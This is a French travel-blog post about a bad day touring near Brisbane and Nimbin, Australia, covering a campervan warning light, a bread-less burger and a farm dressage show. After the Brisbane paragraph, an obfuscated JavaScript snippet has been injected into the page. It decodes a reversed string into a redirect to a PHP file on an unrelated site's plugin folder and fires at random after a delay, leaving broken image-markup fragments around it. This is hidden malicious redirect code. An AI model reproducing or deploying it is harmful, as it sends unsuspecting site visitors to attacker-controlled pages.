Le voyage c’est aussi des journées de galères et des coups de stresse parfois :D… On les appelle les MUD Day.
Réveillé ce matin à Brisbane, comme tous les matins, passage aux toilettes, douche, brossage des dents… On range Flitzi, le lit, petit coup de balais et c’est parti pour découvrir Brisbane…
On est rappelé à l’ordre rapidement, nous sommes dans une grande ville, et grande ville rime avec embouteillage, même en Australie. Pour info, plus de 85% de la population australienne vit dans 8 des grandes villes de cette ile continent (Sydney, Brisbane, Melbourne, Perth, Adélaide…). Nous voulons visiter le Botanic Garden mais nous revoilà perdu entre les sens interdit et les feux rouges infinis. Bon, les grandes villes ne sont pas faites pour nous. Nous décidons de garder que les bons souvenirs de la veille au bord de la rivière Brisbane et des belles lumières de la ville.

$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);} the Brisbane Brigde – Free Ferry Along the river” width=”1024″ height=”681″ /> Brisbane River taking us to the Brisbane Brigde – Free Ferry Along the river
Nous savons qu’il faut nous diriger vers le Sud mais ou s’arrêter? Byron Bay, connu pour sa belle baie et surtout pour être le point le plus à l’Est de l’Australie ou Nimbin, la capitale Hippie Australienne? Avec le temps pourri nous décidons de nous diriger vers Nimbin et laisser Byron pour le lendemain.
Nous prenons la route, et vite un premier arrêt s’impose avec un point d’accès internet pour télécharger la carte du nouvel Etat Australien (NSW: New South Wales) que nous nous apprêtons à franchir sur notre application favorite “WikiCamps”. Arrêt à l’un des multiples Mcdo sur la route, nous y resterons 1 heure pour télécharger la carte et surtout dire Mbrouk l’Aid à nos Familles et Amis. Une fois la carte téléchargée, direction Nimbin. La route est sinueuse, beaucoup beaucoup trop à notre gout. Apres 30 minutes, on a un problème d’huile, OMG, Flitzi est malade 🙁 . Je l’avoue, avec un campervan de location et sachant que le mécanicien coute très cher en Australie nous ne savons pas a quoi nous attendre. Nous vérifions le niveau d’huile, il est correct. Nous rallumons la voiture et le voyant de la pression d’huile est toujours rouge. Nous décidons de prendre le risque est d’avancer jusqu’au prochain village pour le faire vérifier par un mécanicien. Le verdict… RAS. Tout est bon, le fusible du voyant est HS, nous pouvons rouler. Youhouuuu, plus de peur que de mal…

Let’s hit the road Again …
Nous avons faim, très faim. Nous finissons dans un Mcdo et nous commandons un Burger qu’on aura créé par nous même. La pub Mcdo dit « Create your Taste». Ok pas de souci, on choisi donc, un burger avec Lettue, tomates, oignons caramélisés, Guacamole, 3 sortes de Fromages, champignons… WOOW, truc de ouf, on a hâte de manger. La commande au Mcdo (fast food) aura pris 1 heure. 1 heure pour recevoir notre fameux Burger. Ready, Speedy, Eat… Ah, Euuuuh, Whaaaat? C’est un Burger sans pain qu’on nous sert. Oui Oui un burger sans pain :D. Nous rendons notre Burger, histoire d’y ajouter du pain et nous mangeons enfin, ce fut un délice.
Nous arrivons à Nimbin sous la pluie, cette Capitale Hippie, n’est finalement qu’une capitale de Hippies apprentis. En tout cas, les hippies en Inde nous aurons plus impressionnés qu’en Australie.

La foret est splendide et remplis de vie sauvage, seulement quand il fait chaud
La ville se résume à une rue de 200 m de long remplie de magasins vendant toutes sortes d’herbes et d’accessoires multi-color et c’est tout. Nous restons sur notre FAIM.
Nous ferons un tour et puis direction le camping gratuit le plus proche qui est à 22 Km de notre position. Le trajet nous aura pris 1 heure dans une route qui n’en est pas réellement une, dans une forêt tropicale, on a même rencontrer des wallabies (ressemble beaucoup à un Kangourou).
Nous arrivons enfin au camping gratuit, c’est un parking avec des toilettes qui n’ont pas été utilisées depuis plus de 10 ans. Nous décidons de rebrousser chemin et de nous diriger vers notre prochaine destination Byron Bay. Ah bein non, nous finissons par passer la nuit à Nimbin car beaucoup trop d’accidents sur la route à cause de la pluie et nous avons peur pour nos vies et pour celle de Filtzi… Ou pas quoi :D. Nous finissons notre soirée dans une ferme, avec douche chaude (le luxe) et toilettes propres. Le Top de l’histoire, c’est qu’un concours de dressage de chevaux qui ne se produit qu’une fois dans l’année y est organisé le lendemain.

Le concours de dressage commence…
Notre bureau du jour est dans une ferme, en face de chevaux tous plus beaux les uns que les autres. La longue journée est bien loin, et la vie continue.

Already found a job 😀
Les Top de notre MUD Day:
- La pression de l’huile est normal
- Le burger sans pain et puis avec pain était trop bon
- Rencontre avec des wallabies et des kangourous dans la forêt
- Nous prenons une douche chaude et ça, ça n’a pas de prix
- Nous avons fini notre journée dans une ferme avec shows de chevaux de Dressage.
Sinon, pour vous dire que la vie du voyage, c’est génial mais ce n’est pas toujours aussi beau que sur les photos.
Nous avons des vies comme tout le monde, avec des hauts et des bas, c’est juste le rythme qui change:). Qui a dit qu’on voulait une vie parfaite? Elle serait ennuyeuse.
Gros bisous de la ferme et encore Mbrouk l’Aid.

Nimbin, Concours de dressage, L’enfant qui murmure à l’oreille des chevaux
Suivez-nous sur notre blog, notre page Facebook et notre page Instagram.
JerryPeps by AGBackpackers.com
2 réponses